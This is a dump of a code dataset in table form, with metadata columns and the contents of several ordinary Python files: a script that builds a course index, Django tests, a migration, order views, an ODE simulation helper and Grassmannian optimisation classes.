max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
scripts/add_to_page.py
N9199/IIC3253-2021-1
0
6623551
#!/usr/bin/python3 import os import re from datetime import datetime os.chdir(os.path.dirname(__file__)) enunciados = list(map(lambda x: int( x[9:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Enunciados")))) soluciones = list(map(lambda x: int( x[8:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Soluciones")))) enunciados.sort() soluciones.sort() assert(len(enunciados) >= len(soluciones)) with open("../index.md") as f: curr = f.read() re1 = re.compile("Enunciado\d\d\.pdf") re2 = re.compile("Solucion\d\d\.pdf") re3 = re.compile("\\\\subtitle\{.*\}") curr_enunciados = set(map(lambda x: int(x[9:-4]), re1.findall(curr))) curr_soluciones = set(map(lambda x: int(x[8:-4]), re2.findall(curr))) # Note: index 6 for update date, indices in [9,len(curr)-3] are for display list curr = curr.split('\n') delta = [] out = [] j = 0 for i in range(len(enunciados)): while j+1 < len(soluciones) and int(enunciados[i]) > int(soluciones[j]): j += 1 if int(enunciados[i]) not in curr_enunciados: delta.append(f"Enunciado {enunciados[i]:02d}") if soluciones and int(soluciones[j]) not in curr_soluciones: delta.append(f"Solución {soluciones[j]:02d}") with open(f"../pdfs/Ayudantias/{enunciados[i]:02d}.tex") as f: temp1 = list( map(lambda x: x[10:-1], re3.findall(f.read())))[0] if soluciones and enunciados[i] == soluciones[j]: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf) - [Solución](pdfs/Soluciones/Solucion{soluciones[j]:02d}.pdf)" else: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf)" out.append(temp) curr[6] = f"Última actualización: {datetime.today().strftime('%d/%m')} ({', '.join(delta)})" curr = curr[:10]+out+curr[-3:] with open("../index.md", 'w') as f: f.write('\n'.join(curr))
#!/usr/bin/python3 import os import re from datetime import datetime os.chdir(os.path.dirname(__file__)) enunciados = list(map(lambda x: int( x[9:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Enunciados")))) soluciones = list(map(lambda x: int( x[8:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Soluciones")))) enunciados.sort() soluciones.sort() assert(len(enunciados) >= len(soluciones)) with open("../index.md") as f: curr = f.read() re1 = re.compile("Enunciado\d\d\.pdf") re2 = re.compile("Solucion\d\d\.pdf") re3 = re.compile("\\\\subtitle\{.*\}") curr_enunciados = set(map(lambda x: int(x[9:-4]), re1.findall(curr))) curr_soluciones = set(map(lambda x: int(x[8:-4]), re2.findall(curr))) # Note: index 6 for update date, indices in [9,len(curr)-3] are for display list curr = curr.split('\n') delta = [] out = [] j = 0 for i in range(len(enunciados)): while j+1 < len(soluciones) and int(enunciados[i]) > int(soluciones[j]): j += 1 if int(enunciados[i]) not in curr_enunciados: delta.append(f"Enunciado {enunciados[i]:02d}") if soluciones and int(soluciones[j]) not in curr_soluciones: delta.append(f"Solución {soluciones[j]:02d}") with open(f"../pdfs/Ayudantias/{enunciados[i]:02d}.tex") as f: temp1 = list( map(lambda x: x[10:-1], re3.findall(f.read())))[0] if soluciones and enunciados[i] == soluciones[j]: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf) - [Solución](pdfs/Soluciones/Solucion{soluciones[j]:02d}.pdf)" else: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf)" out.append(temp) curr[6] = f"Última actualización: {datetime.today().strftime('%d/%m')} ({', '.join(delta)})" curr = curr[:10]+out+curr[-3:] with open("../index.md", 'w') as f: f.write('\n'.join(curr))
en
0.507772
#!/usr/bin/python3 # Note: index 6 for update date, indices in [9,len(curr)-3] are for display list
2.467906
2
dof_conf/core/tests/test_views.py
DevOfFuture/dof-conf
3
6623552
<filename>dof_conf/core/tests/test_views.py from django.shortcuts import reverse from dof_conf.core.tests import TestCase class TestHome(TestCase): def test_should_render(self): url = reverse('core:home') response = self.get(url) self.assertEqual(response.status_code, 200) self.assertInContext('speakers') self.assertInContext('schedule') self.assertInContext('reservation_form') class TestReservations(TestCase): def setUp(self): self.url = reverse('core:reservations') def test_render(self): response = self.get(self.url) self.assertEqual(response.status_code, 200) self.assertInContext('form')
<filename>dof_conf/core/tests/test_views.py from django.shortcuts import reverse from dof_conf.core.tests import TestCase class TestHome(TestCase): def test_should_render(self): url = reverse('core:home') response = self.get(url) self.assertEqual(response.status_code, 200) self.assertInContext('speakers') self.assertInContext('schedule') self.assertInContext('reservation_form') class TestReservations(TestCase): def setUp(self): self.url = reverse('core:reservations') def test_render(self): response = self.get(self.url) self.assertEqual(response.status_code, 200) self.assertInContext('form')
none
1
2.250946
2
webapi/servidorapi/migrations/0001_initial.py
aecheverria40/proyectomoviles
0
6623553
<reponame>aecheverria40/proyectomoviles # Generated by Django 2.1.3 on 2018-11-13 07:02 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Alumno', fields=[ ('IdAlumno', models.CharField(max_length=100, primary_key=True, serialize=False)), ('apellidoPaternoAlumno', models.CharField(max_length=100)), ('apellidoMaternoAlumno', models.CharField(max_length=100)), ('nombreAlumno', models.CharField(max_length=100)), ('direccionAlumno', models.CharField(max_length=100)), ('telefonoAlumno', models.CharField(max_length=20)), ('emailAlumno', models.CharField(max_length=50)), ], ), migrations.CreateModel( name='Boleta', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('perteneceAlumno', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Alumno')), ], ), migrations.CreateModel( name='Clase', fields=[ ('IdClase', models.CharField(max_length=100, primary_key=True, serialize=False)), ('Materia', models.CharField(max_length=100)), ('Horario', models.CharField(max_length=100)), ], ), migrations.CreateModel( name='Coordinador', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoCoordinador', models.CharField(max_length=100)), ('apellidoMaternoCoordinador', models.CharField(max_length=100)), ('nombreCoordinador', models.CharField(max_length=100)), ('direccionCoordinador', models.CharField(max_length=100)), ('telefonoCoordinador', models.CharField(max_length=20)), ('email_Coordinador', models.CharField(max_length=50)), ('IdCoordinador', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Coordinadores', 
'verbose_name': 'Coordinador', }, ), migrations.CreateModel( name='Docente', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoDocente', models.CharField(max_length=100)), ('apellidoMaterno', models.CharField(max_length=100)), ('nombreDocente', models.CharField(max_length=100)), ('direccionDocente', models.CharField(max_length=100)), ('telefonoDocente', models.CharField(max_length=20)), ('emailDocente', models.CharField(max_length=50)), ('IdDocente', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Docentes', 'verbose_name': 'Docente', }, ), migrations.CreateModel( name='Escuela', fields=[ ('clave', models.CharField(max_length=100, primary_key=True, serialize=False)), ('direccion', models.CharField(max_length=100)), ('telefono', models.CharField(max_length=20)), ('director', models.CharField(max_length=100)), ('coordinador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Coordinador')), ], ), migrations.CreateModel( name='Parcial', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('calificacion', models.SmallIntegerField()), ('faltas', models.SmallIntegerField()), ('comentarios', models.CharField(max_length=100)), ('boletaPertenece', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Boleta')), ], ), migrations.AddField( model_name='docente', name='escuelas', field=models.ManyToManyField(to='servidorapi.Escuela'), ), migrations.AddField( model_name='clase', name='docenteImpartiendo', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Docente'), ), migrations.AddField( model_name='clase', name='escuelaImparte', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Escuela'), ), migrations.AddField( model_name='boleta', 
name='perteneceClase', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Clase'), ), migrations.AddField( model_name='alumno', name='clases', field=models.ManyToManyField(to='servidorapi.Clase'), ), ]
# Generated by Django 2.1.3 on 2018-11-13 07:02 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Alumno', fields=[ ('IdAlumno', models.CharField(max_length=100, primary_key=True, serialize=False)), ('apellidoPaternoAlumno', models.CharField(max_length=100)), ('apellidoMaternoAlumno', models.CharField(max_length=100)), ('nombreAlumno', models.CharField(max_length=100)), ('direccionAlumno', models.CharField(max_length=100)), ('telefonoAlumno', models.CharField(max_length=20)), ('emailAlumno', models.CharField(max_length=50)), ], ), migrations.CreateModel( name='Boleta', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('perteneceAlumno', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Alumno')), ], ), migrations.CreateModel( name='Clase', fields=[ ('IdClase', models.CharField(max_length=100, primary_key=True, serialize=False)), ('Materia', models.CharField(max_length=100)), ('Horario', models.CharField(max_length=100)), ], ), migrations.CreateModel( name='Coordinador', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoCoordinador', models.CharField(max_length=100)), ('apellidoMaternoCoordinador', models.CharField(max_length=100)), ('nombreCoordinador', models.CharField(max_length=100)), ('direccionCoordinador', models.CharField(max_length=100)), ('telefonoCoordinador', models.CharField(max_length=20)), ('email_Coordinador', models.CharField(max_length=50)), ('IdCoordinador', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Coordinadores', 'verbose_name': 'Coordinador', }, ), 
migrations.CreateModel( name='Docente', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoDocente', models.CharField(max_length=100)), ('apellidoMaterno', models.CharField(max_length=100)), ('nombreDocente', models.CharField(max_length=100)), ('direccionDocente', models.CharField(max_length=100)), ('telefonoDocente', models.CharField(max_length=20)), ('emailDocente', models.CharField(max_length=50)), ('IdDocente', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Docentes', 'verbose_name': 'Docente', }, ), migrations.CreateModel( name='Escuela', fields=[ ('clave', models.CharField(max_length=100, primary_key=True, serialize=False)), ('direccion', models.CharField(max_length=100)), ('telefono', models.CharField(max_length=20)), ('director', models.CharField(max_length=100)), ('coordinador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Coordinador')), ], ), migrations.CreateModel( name='Parcial', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('calificacion', models.SmallIntegerField()), ('faltas', models.SmallIntegerField()), ('comentarios', models.CharField(max_length=100)), ('boletaPertenece', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Boleta')), ], ), migrations.AddField( model_name='docente', name='escuelas', field=models.ManyToManyField(to='servidorapi.Escuela'), ), migrations.AddField( model_name='clase', name='docenteImpartiendo', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Docente'), ), migrations.AddField( model_name='clase', name='escuelaImparte', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Escuela'), ), migrations.AddField( model_name='boleta', name='perteneceClase', 
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Clase'), ), migrations.AddField( model_name='alumno', name='clases', field=models.ManyToManyField(to='servidorapi.Clase'), ), ]
en
0.738631
# Generated by Django 2.1.3 on 2018-11-13 07:02
1.715448
2
core/calculators/tests/test_order_calculator.py
stanwood/traidoo-api
3
6623554
import itertools from decimal import Decimal import pytest from core.calculators.order_calculator import OrderCalculatorMixin pytestmark = pytest.mark.django_db def test_item_price_calculation(): item = OrderCalculatorMixin.Item(amount=3, price=10, vat=20, count=2, seller=1) price_value = item.value assert price_value.netto == 3 * 10 * 2 assert price_value.brutto == 3 * 10 * 2 * 1.2 assert price_value.vat == 3 * 10 * 2 * 0.2 def test_total_calculation_error(): items = [ OrderCalculatorMixin.Item( vat=7, price=9.48, amount=1, count=1.97, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=1.79, amount=5, count=1.83, seller="biogemuse" ), ] gross = 0 items = sorted(items, key=lambda l: l.seller) for seller_id, items in itertools.groupby(items, lambda item: item.seller): gross += OrderCalculatorMixin.calculate_gross_value_of_items(items) assert float(gross) == float(Decimal("37.52")) def test_total_calculation_sort_by_vat_rate(): items = [ OrderCalculatorMixin.Item( vat=7, price=13.5, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=19, price=19.3, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=119.7, amount=1, count=1, seller="traidoo" ), ] mixin = OrderCalculatorMixin() assert mixin.calculate_gross_value_of_items(items) == Decimal("165.49")
import itertools from decimal import Decimal import pytest from core.calculators.order_calculator import OrderCalculatorMixin pytestmark = pytest.mark.django_db def test_item_price_calculation(): item = OrderCalculatorMixin.Item(amount=3, price=10, vat=20, count=2, seller=1) price_value = item.value assert price_value.netto == 3 * 10 * 2 assert price_value.brutto == 3 * 10 * 2 * 1.2 assert price_value.vat == 3 * 10 * 2 * 0.2 def test_total_calculation_error(): items = [ OrderCalculatorMixin.Item( vat=7, price=9.48, amount=1, count=1.97, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=1.79, amount=5, count=1.83, seller="biogemuse" ), ] gross = 0 items = sorted(items, key=lambda l: l.seller) for seller_id, items in itertools.groupby(items, lambda item: item.seller): gross += OrderCalculatorMixin.calculate_gross_value_of_items(items) assert float(gross) == float(Decimal("37.52")) def test_total_calculation_sort_by_vat_rate(): items = [ OrderCalculatorMixin.Item( vat=7, price=13.5, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=19, price=19.3, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=119.7, amount=1, count=1, seller="traidoo" ), ] mixin = OrderCalculatorMixin() assert mixin.calculate_gross_value_of_items(items) == Decimal("165.49")
none
1
2.462162
2
orders/views.py
RohanIRathi/Product-Management-System
0
6623555
<gh_stars>0 from datetime import datetime import json from django.http import JsonResponse from django.views.decorators.csrf import csrf_exempt from home.models import User from products.models import Product from .models import Order, OrderProduct # Create your views here. def get_distributor_orders(request): if request.method == 'GET': user_id = request.session.decode(request.headers['Session'])['id'] try: retailer_id = int(request.GET['retailer']) except: retailer_id = None try: distributor = User.objects.get(pk=user_id) if distributor.is_superuser and distributor.is_staff: orders = Order.objects.filter(DistributorId=distributor).order_by('-CreationDate') if retailer_id: retailer = User.objects.get(pk=retailer_id) orders = orders.filter(RetailerId=retailer) distributor_orders = [order.json() for order in orders] return JsonResponse({'success': True, 'orders': distributor_orders}, status=200) else: return JsonResponse({'success': False, 'error': 'Access Denied'}, status=403) except: return JsonResponse({'success': False, 'error': 'User Does Not Exist'}, status=400) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_retailer_orders(request): if request.method == 'GET': retailer_id = request.session.decode(request.headers['Session'])['id'] try: distributor_id = request.GET['distributor'] except: distributor_id = None orders = Order.objects.filter(RetailerId=retailer_id).order_by('-CreationDate') if distributor_id: orders = orders.filter(DistributorId=distributor_id) retailer_orders = [order.json() for order in orders] return JsonResponse({'orders': retailer_orders, 'success': True}, status=200) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_order_details(request, **kwargs): if request.method == 'GET': order_id = kwargs['order_id'] try: order = Order.objects.get(pk=order_id) return JsonResponse({'order': order.json(), 'success': True}, status=200) except Order.DoesNotExist: return 
JsonResponse({'success': False, 'error': 'Invalid Order Id'}, status=400) except: return JsonResponse({'success': False, 'error': 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) @csrf_exempt def add_order(request): if request.method == 'POST': data = json.loads(request.body) distributor = User.objects.get(pk=data['distributor']) retailer = User.objects.get(pk=data['retailer']) totalQuantity = data['totalQuantity'] totalAmount = data['totalAmount'] products = data['products'] product_list, products_to_update = [], [] order = Order( DistributorId=distributor, RetailerId=retailer, TotalQuantity=totalQuantity, TotalAmount=totalAmount ) try: order.save() totalAmount, totalQuantity = 0, 0 for orderproduct in products: product = Product.objects.get(pk=orderproduct['product']) if product.Quantity < orderproduct['quantity']: raise Exception('Insufficient Quantity') order_product = OrderProduct( Order=order, Product=product, Discount=orderproduct['discount'], Quantity=orderproduct['quantity'] ) totalAmount = float(totalAmount) + float((float(product.Price) - (float(product.Price) * float(order_product.Discount) * 0.01)) * float(order_product.Quantity)) totalQuantity = float(totalQuantity) + float(order_product.Quantity) product.Quantity -= order_product.Quantity products_to_update.append(product) product_list.append(order_product) order.TotalAmount = totalAmount order.TotalQuantity = totalQuantity if float(retailer.PendingAmount) + float(order.TotalAmount) > float(retailer.CreditLimit): raise Exception('Insufficient Credit Limit') retailer.PendingAmount = float(retailer.PendingAmount) + float(order.TotalAmount) OrderProduct.objects.bulk_create(product_list) order.save() retailer.save() for product in products_to_update: product.save() return JsonResponse({'success': True, 'created order': order.json()}, status=200) except Exception as e: order.delete() return JsonResponse({'success': False, 'error': 
str(e) or 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def order_paid(request): order_id = int(request.GET['order']) session = request.session.decode(request.headers['Session']) user_id = session['id'] try: distributor = User.objects.get(pk=user_id) if not distributor.is_superuser or not distributor.is_staff: raise User.DoesNotExist() order = Order.objects.get(pk=order_id) if order.DistributorId != distributor: raise Order.DoesNotExist() order.PaymentDate = datetime.now() order.save() return JsonResponse({'success': True, 'message': 'Order marked as paid'}, status=200) except User.DoesNotExist: return JsonResponse({'success': False, 'error': 'Action Unauthoriezd'}, status=403) except Order.DoesNotExist: return JsonResponse({'success': False, 'error': 'Invalid Order Selected'}, status=404)
from datetime import datetime import json from django.http import JsonResponse from django.views.decorators.csrf import csrf_exempt from home.models import User from products.models import Product from .models import Order, OrderProduct # Create your views here. def get_distributor_orders(request): if request.method == 'GET': user_id = request.session.decode(request.headers['Session'])['id'] try: retailer_id = int(request.GET['retailer']) except: retailer_id = None try: distributor = User.objects.get(pk=user_id) if distributor.is_superuser and distributor.is_staff: orders = Order.objects.filter(DistributorId=distributor).order_by('-CreationDate') if retailer_id: retailer = User.objects.get(pk=retailer_id) orders = orders.filter(RetailerId=retailer) distributor_orders = [order.json() for order in orders] return JsonResponse({'success': True, 'orders': distributor_orders}, status=200) else: return JsonResponse({'success': False, 'error': 'Access Denied'}, status=403) except: return JsonResponse({'success': False, 'error': 'User Does Not Exist'}, status=400) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_retailer_orders(request): if request.method == 'GET': retailer_id = request.session.decode(request.headers['Session'])['id'] try: distributor_id = request.GET['distributor'] except: distributor_id = None orders = Order.objects.filter(RetailerId=retailer_id).order_by('-CreationDate') if distributor_id: orders = orders.filter(DistributorId=distributor_id) retailer_orders = [order.json() for order in orders] return JsonResponse({'orders': retailer_orders, 'success': True}, status=200) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_order_details(request, **kwargs): if request.method == 'GET': order_id = kwargs['order_id'] try: order = Order.objects.get(pk=order_id) return JsonResponse({'order': order.json(), 'success': True}, status=200) except Order.DoesNotExist: return 
JsonResponse({'success': False, 'error': 'Invalid Order Id'}, status=400) except: return JsonResponse({'success': False, 'error': 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) @csrf_exempt def add_order(request): if request.method == 'POST': data = json.loads(request.body) distributor = User.objects.get(pk=data['distributor']) retailer = User.objects.get(pk=data['retailer']) totalQuantity = data['totalQuantity'] totalAmount = data['totalAmount'] products = data['products'] product_list, products_to_update = [], [] order = Order( DistributorId=distributor, RetailerId=retailer, TotalQuantity=totalQuantity, TotalAmount=totalAmount ) try: order.save() totalAmount, totalQuantity = 0, 0 for orderproduct in products: product = Product.objects.get(pk=orderproduct['product']) if product.Quantity < orderproduct['quantity']: raise Exception('Insufficient Quantity') order_product = OrderProduct( Order=order, Product=product, Discount=orderproduct['discount'], Quantity=orderproduct['quantity'] ) totalAmount = float(totalAmount) + float((float(product.Price) - (float(product.Price) * float(order_product.Discount) * 0.01)) * float(order_product.Quantity)) totalQuantity = float(totalQuantity) + float(order_product.Quantity) product.Quantity -= order_product.Quantity products_to_update.append(product) product_list.append(order_product) order.TotalAmount = totalAmount order.TotalQuantity = totalQuantity if float(retailer.PendingAmount) + float(order.TotalAmount) > float(retailer.CreditLimit): raise Exception('Insufficient Credit Limit') retailer.PendingAmount = float(retailer.PendingAmount) + float(order.TotalAmount) OrderProduct.objects.bulk_create(product_list) order.save() retailer.save() for product in products_to_update: product.save() return JsonResponse({'success': True, 'created order': order.json()}, status=200) except Exception as e: order.delete() return JsonResponse({'success': False, 'error': 
str(e) or 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def order_paid(request): order_id = int(request.GET['order']) session = request.session.decode(request.headers['Session']) user_id = session['id'] try: distributor = User.objects.get(pk=user_id) if not distributor.is_superuser or not distributor.is_staff: raise User.DoesNotExist() order = Order.objects.get(pk=order_id) if order.DistributorId != distributor: raise Order.DoesNotExist() order.PaymentDate = datetime.now() order.save() return JsonResponse({'success': True, 'message': 'Order marked as paid'}, status=200) except User.DoesNotExist: return JsonResponse({'success': False, 'error': 'Action Unauthoriezd'}, status=403) except Order.DoesNotExist: return JsonResponse({'success': False, 'error': 'Invalid Order Selected'}, status=404)
en
0.968116
# Create your views here.
2.074186
2
replica/core.py
TimeWz667/replica
0
6623556
import numpy as np import pandas as pd from scipy.integrate import solve_ivp import os import json from numba import njit __author__ = '<NAME>' __all__ = ['Parameters', 'trm2dy', 'simulate', 'output_posterior'] @njit def trm2dy(trm, y): dy = np.zeros_like(y) ns = len(y) for src in range(ns): for tar in range(ns): flow = y[src] * trm[src, tar] dy[src] -= flow dy[tar] += flow return dy class Parameters: def __init__(self, pars, transformed): self.Pars = pars self.Transformed = transformed def __getitem__(self, item): try: return self.Pars[item] except KeyError: return self.Transformed[item] def list_variables(self): return list(self.Pars.keys()) + list(self.Transformed.keys()) def to_json(self): return dict(self.Pars) def simulate(model, pars, y0, t_out, t_warmup=200, dfe=None): times = np.array(t_out) time0 = min(times) ys_wp = solve_ivp(model, [time0 - t_warmup, time0], y0, args=(pars, ), events=dfe, method="RK23") if len(ys_wp.t_events[0]) > 0 or not ys_wp.success: return None, None, {'succ': False, 'res': 'DFE reached'} y0 = ys_wp.y[:, -1] ys = solve_ivp(model, [time0, max(times)], y0, args=(pars,), events=dfe, dense_output=True) if len(ys.t_events[0]) > 0 or not ys.success: return None, None, {'succ': False, 'res': 'DFE reached'} ms = pd.DataFrame([model.measure(t, ys.sol(t), pars) for t in times]) ms = ms.set_index('Time') msg = {'succ': True} return ys, ms, msg def output_posterior(post, out_path): if not os.path.exists(out_path): os.makedirs(out_path) with open(out_path + '/post.json', 'w') as f: json.dump(post.to_json()['Posterior'], f) post.DF.to_csv(out_path + '/post.csv') # post.Message['Trace'].to_csv(out_path + '/post_trace.csv')
import numpy as np import pandas as pd from scipy.integrate import solve_ivp import os import json from numba import njit __author__ = '<NAME>' __all__ = ['Parameters', 'trm2dy', 'simulate', 'output_posterior'] @njit def trm2dy(trm, y): dy = np.zeros_like(y) ns = len(y) for src in range(ns): for tar in range(ns): flow = y[src] * trm[src, tar] dy[src] -= flow dy[tar] += flow return dy class Parameters: def __init__(self, pars, transformed): self.Pars = pars self.Transformed = transformed def __getitem__(self, item): try: return self.Pars[item] except KeyError: return self.Transformed[item] def list_variables(self): return list(self.Pars.keys()) + list(self.Transformed.keys()) def to_json(self): return dict(self.Pars) def simulate(model, pars, y0, t_out, t_warmup=200, dfe=None): times = np.array(t_out) time0 = min(times) ys_wp = solve_ivp(model, [time0 - t_warmup, time0], y0, args=(pars, ), events=dfe, method="RK23") if len(ys_wp.t_events[0]) > 0 or not ys_wp.success: return None, None, {'succ': False, 'res': 'DFE reached'} y0 = ys_wp.y[:, -1] ys = solve_ivp(model, [time0, max(times)], y0, args=(pars,), events=dfe, dense_output=True) if len(ys.t_events[0]) > 0 or not ys.success: return None, None, {'succ': False, 'res': 'DFE reached'} ms = pd.DataFrame([model.measure(t, ys.sol(t), pars) for t in times]) ms = ms.set_index('Time') msg = {'succ': True} return ys, ms, msg def output_posterior(post, out_path): if not os.path.exists(out_path): os.makedirs(out_path) with open(out_path + '/post.json', 'w') as f: json.dump(post.to_json()['Posterior'], f) post.DF.to_csv(out_path + '/post.csv') # post.Message['Trace'].to_csv(out_path + '/post_trace.csv')
en
0.230896
# post.Message['Trace'].to_csv(out_path + '/post_trace.csv')
2.253931
2
grslra/spaces.py
clemenshage/grslra
0
6623557
<gh_stars>0 from abc import ABCMeta, abstractmethod import numpy as np from tools import msin, mcos class SpaceMeta: __metaclass__ = ABCMeta @abstractmethod def get_G(self, grad, X): # this function returns the projected gradient pass @abstractmethod def get_H(self, G, gamma, tauH): # this function computes the search direction from the current projected gradient and the past search direction pass @abstractmethod def update_variable(self, X, H, t): # this function updates the variable using the search direction and the step size pass @abstractmethod def transport(self, Eta, X, H, t): # this function transports an element along H into the tangent space at distance t pass class Euclidean(SpaceMeta): def __init__(self): pass def get_G(self, grad, X): return grad def get_H(self, G, gamma, tauH): H = -G + gamma * tauH return H def update_variable(self, X, H, t): return X + t * H def transport(self, Eta, X, H, t): return Eta class GrassmannianSVD(SpaceMeta): # see Edelman et al. def __init__(self, m, k): self.U_H = np.zeros((m, k)) self.Sigma_H = np.zeros((k, k)) self.V_H = np.zeros((k, k)) def get_G(self, grad, X): G = grad - np.dot(X, np.dot(X.T, grad)) return G def get_H(self, G, gamma, tauH): H = -G + gamma * tauH try: self.U_H, sigmas_H, V_H_T = np.linalg.svd(H, full_matrices=False) self.Sigma_H[:, :] = np.diag(sigmas_H) self.V_H = V_H_T.T except: print "Problem is badly conditioned. Aborting..." exit() return H def update_variable(self, X, H, t): X_t = np.dot(np.dot(X, np.dot(self.V_H, mcos(self.Sigma_H * t))) + np.dot(self.U_H, msin(self.Sigma_H * t)), self.V_H.T) return X_t def transport(self, Eta, X, H, t): tauEta = Eta - np.dot(np.dot(np.dot(X, self.V_H), msin(self.Sigma_H * t)) + np.dot(self.U_H, (np.eye(X.shape[1]) - mcos(self.Sigma_H * t))), np.dot(self.U_H.T, Eta)) return tauEta class GrassmannianSVDrank1(SpaceMeta): # see GROUSE method by Balzano et al. 
def __init__(self, m, k): self.u_H = np.zeros((m,)) self.alpha = 0 self.sigma_H = 0 self.v_H = np.zeros((k,)) self.beta = 0 def get_G(self, grad, X): G = (grad[0] - np.dot(X, np.dot(X.T, grad[0])), grad[1]) return G def get_H(self, G, gamma, tauH): H = (-G[0], G[1]) self.u_H = H[0] / np.linalg.norm(H[0]) self.v_H = H[1] / np.linalg.norm(H[1]) self.sigma_H = np.linalg.norm(H[0]) * np.linalg.norm(H[1]) return H def update_variable(self, X, H, t): X_t = X + np.outer((np.cos(self.sigma_H * t) - 1) * np.dot(X, self.v_H) + np.sin(self.sigma_H * t) * self.u_H, self.v_H) return X_t def transport(self, Eta, X, H, t): pass
from abc import ABCMeta, abstractmethod import numpy as np from tools import msin, mcos class SpaceMeta: __metaclass__ = ABCMeta @abstractmethod def get_G(self, grad, X): # this function returns the projected gradient pass @abstractmethod def get_H(self, G, gamma, tauH): # this function computes the search direction from the current projected gradient and the past search direction pass @abstractmethod def update_variable(self, X, H, t): # this function updates the variable using the search direction and the step size pass @abstractmethod def transport(self, Eta, X, H, t): # this function transports an element along H into the tangent space at distance t pass class Euclidean(SpaceMeta): def __init__(self): pass def get_G(self, grad, X): return grad def get_H(self, G, gamma, tauH): H = -G + gamma * tauH return H def update_variable(self, X, H, t): return X + t * H def transport(self, Eta, X, H, t): return Eta class GrassmannianSVD(SpaceMeta): # see Edelman et al. def __init__(self, m, k): self.U_H = np.zeros((m, k)) self.Sigma_H = np.zeros((k, k)) self.V_H = np.zeros((k, k)) def get_G(self, grad, X): G = grad - np.dot(X, np.dot(X.T, grad)) return G def get_H(self, G, gamma, tauH): H = -G + gamma * tauH try: self.U_H, sigmas_H, V_H_T = np.linalg.svd(H, full_matrices=False) self.Sigma_H[:, :] = np.diag(sigmas_H) self.V_H = V_H_T.T except: print "Problem is badly conditioned. Aborting..." exit() return H def update_variable(self, X, H, t): X_t = np.dot(np.dot(X, np.dot(self.V_H, mcos(self.Sigma_H * 